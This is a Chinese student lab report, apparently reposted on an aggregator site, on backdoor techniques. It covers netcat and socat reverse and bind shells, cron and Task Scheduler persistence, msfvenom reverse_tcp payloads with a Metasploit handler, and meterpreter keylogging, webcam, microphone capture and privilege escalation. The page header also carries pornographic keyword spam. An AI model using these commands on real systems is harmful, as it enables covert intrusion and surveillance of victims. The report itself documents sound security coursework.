日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

2018-2019 Exp2 后门原理与实践

發布時間:2025/3/21 编程问答 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 2018-2019 Exp2 后门原理与实践 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

2018-2019 Exp2 后門原理與實踐

目錄


一、實驗內容說明及基礎問題回答
二、工具準備

  • 查看WindowsIP和LinuxIP
  • Windows獲得Linuxshell
  • Linux 獲得Windows shell
  • 使用nc傳輸數據

三、實驗過程

  • 使用netcat獲取主機操作Shell,cron啟動
  • 使用socat獲取主機操作Shell, 任務計劃啟動
  • 使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機并運行獲取主機Shell
  • 使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,并嘗試提權
  • 可選加分內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連接Shell

四、問題與思考



一、實驗內容說明及基礎問題回答


1、實驗內容
(1)使用netcat獲取主機操作Shell,cron啟動 (0.5分)

(2)使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分)

(3)使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機并運行獲取主機Shell(0.5分)

(4)使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,并嘗試提權 (2分)

(5)可選加分內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連接Shell(1分)加分內容一并寫入本實驗報告。

2、基礎問題回答
1)例舉你能想到的一個后門進入到你系統中的可能方式?

  • 破解Linux計算機賬號密碼
  • 替換login程序,提供特殊口令隱身登錄
  • 在文件系統中隱藏后門

(2)例舉你知道的后門如何啟動起來(win及linux)的方式?

  • Linux:通過crontab功能將木馬設置為定時啟動,控制主機保持監聽狀態就能周期性啟動后門,也可以通過對正常然健的綁定注入shellcode開啟后門。
  • win:被動下載或接受后門程序,當受害方點擊運行該程序后門便會啟動。

(3)Meterpreter有哪些給你映像深刻的功能?

  • 基本功能(基本的連接、執行指令)
  • 擴展功能(如搜集用戶信息、安裝服務等功能)

(4)如何發現自己有系統有沒有被安裝后門?

  • 安裝殺毒軟件:可以進行實時防護,如老師課堂演示中在開啟軟件保護模式情況下,若有后門可疑程序會即刻將其刪除。
  • 檢測網絡連接:查看是否有IP與本機建立連接

返回目錄



二、工具準備


  • 查看WindowsIP和LinuxIP
    • Windows下用命令ipconfig

    • Linux下用ifconfig

Windows獲得Linuxshell
  • 使用ncat程序,輸入ncat.exe -l -p 5226監聽本機5226端口

  • 在kali中使用nc指令的-e選項,輸入nc 172.30.2.26 5226 -e /bin/sh反向連接Windows主機的5226端口

  • 在Windows端,獲得kali的shell

Linux 獲得Windows shell
  • 使用nc指令監聽5226端口

  • 在Windows下,使用ncat.exe程序的-e選項反向連接kali主機的5226端口

  • 此時kali可以看到Windows的命令提示,可以輸入相關Windows命令(此處輸入的是dir)

使用nc傳輸數據
  • Windows監聽5226端口

  • Kali下連接到Windows的5226端口

  • 建立連接后傳輸數據

返回目錄



三、實驗過程

使用netcat獲取主機操作Shell,cron啟動

  • 在Windows下監聽5226端口

  • 在kali中,用crontab -e編輯一條定時任務,選擇編輯器3

  • 在最后一行添加30 * * * * /bin/netcat 172.30.2.26 5226 -e /bin/sh,意思是在每小時的第30分鐘反向連接Windows主機的5226端口

  • 時間到了23:30時,已經獲得kali的shell,可以輸入指令

使用socat獲取主機操作Shell, 任務計劃啟動

socat是ncat的增強版,它使用的格式是socat [options] <address> <address>,其中兩個address是必選項,而options 是可選項。
socat的基本功能就是建立兩個雙向的字節流,數據就在其間傳輸,參數address就是代表了其中的一個方向。所謂流,代表了數據的流向,而數據則可以有許多不同的類型,命令中也就相應需要許多選項對各種不同的類型數據流進行限定與說明。

  • 在win10系統下,右擊屏幕左下角windows圖標,選擇“計算機管理”(或者直接搜索“計算機管理”)

  • 在任務計劃程序創建任務,填寫任務名稱,并新建一個觸發器

  • 在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5226 exec:cmd.exe,pty,stderr,這個命令的作用是把cmd.exe綁定到端口5226,同時把cmd.exe的stderr重定向到stdout上

  • 創建完成之后,按Windows+L快捷鍵鎖定計算機,再次打開時,找到你創建的任務雙擊后,可以發現之前創建的任務已經開始運行

  • 此時,在Kali環境下輸入指令socat - tcp:172.30.2.26:5226,這里的第一個參數-代表標準的輸入輸出,第二個流連接到Windows主機的5226端口,此時可以發現已經成功獲得了一個cmd shell

使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機并運行獲取主機Shell

  • 輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.130 LPORT=5226 -f exe > 20165226_backdoor.exe生成后門程序

    注意此時IP地址為LinuxIP

  • Windows下執行ncat.exe -lv 5226 > 20165226_backdoor.exe,進入接受模式
  • Linux中執行nc 172.30.2.26 5226 < 20165226_backdoor.exe,注意關閉病毒查殺軟件

    此時IP地址為主機即WindowsIP

  • 傳送接收文件成功

  • 在kali中打開終端,輸入msfconsole指令進入msf控制臺

  • 輸入use exploit/multi/handler進入監聽模塊

  • 輸入set payload windows/meterpreter/reverse_tcp設置payload

  • 依次輸入set LHOST 192.168.170.130和set LPORT 5226設置IP及端口

    注意此時IP地址為LinuxIP,和生成後門程序時指定的IP相同

  • 設置完成,開始監聽exlpoit

  • 運行Windows下的后門程序

  • kali已經獲得Windows主機的連接,并得到遠程控制的shell

使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容

  • 使用record_mic指令可以截獲一段音頻

  • 使用webcam_snap指令可以使用攝像頭進行拍照

  • 使用screenshot指令可以進行截屏

  • 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄

  • 先使用getuid指令查看當前用戶,使用getsystem指令進行提權

可選加分內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連接Shell

  • 使用命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.170.128 LPORT=5226 -x /root/20165226/exp2/pwn1 -f elf > 5226pwn生成以pwn1模板這個elf文件格式的shellcode文件5226pwn

  • 輸入指令msfconsole,進入msf命令行
use exploit/multi/handler /*進入handler模式*/set payload linux/x86/meterpreter/reverse_tcp /*對應生成的后門程序設置payload*/show options /*查看當前信息狀態*/set LHOST 192.168.170.128 /*設置LHOST,其中ip為攻擊者Linux的ip*/set LPORT 5226 /*設置LPORT*/exploit /*啟動監聽*/

  • 在kali上運行后門文件5226pwn,在kali中執行pwn2時應先加權限 chmod +x 5226pwn
  • 此時攻擊者Linux上已經獲得了被攻擊者Linux的連接,并且得到了遠程控制的shell

返回目錄



四、問題與思考

  • 問題1:kali使用nc反彈連接后主機沒有任何顯示

  • 問題1解決方案:在空白處輸入命令,如ls等,再回車即可

  • 問題2:kali中使用cron啟動,但在編輯的時間點并未獲取kali的shell
  • 問題2解決方案:

通過重新查看編輯文件,發現并未寫入端口號

于是將最后一行改為30 * * * * /bin/netcat 172.30.2.26 5226 -e /bin/sh

  • 問題3:在進行第二個socat實驗時未成功獲得cmd shell

  • 問題3解決方案:通過校對命令行,發現輸入命令時將-和tcp:連在一起了,正確書寫為socat - tcp:....,一定注意之間的空格

  • 問題4:MSF監聽時最后無法獲取信息

  • 問題4解決方案:發現是在IP設置時出現問題,重新啟動終端將步驟從頭調試。
    返回目錄



轉載于:https://www.cnblogs.com/musea/p/10562698.html

總結

以上是生活随笔為你收集整理的2018-2019 Exp2 后门原理与实践的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。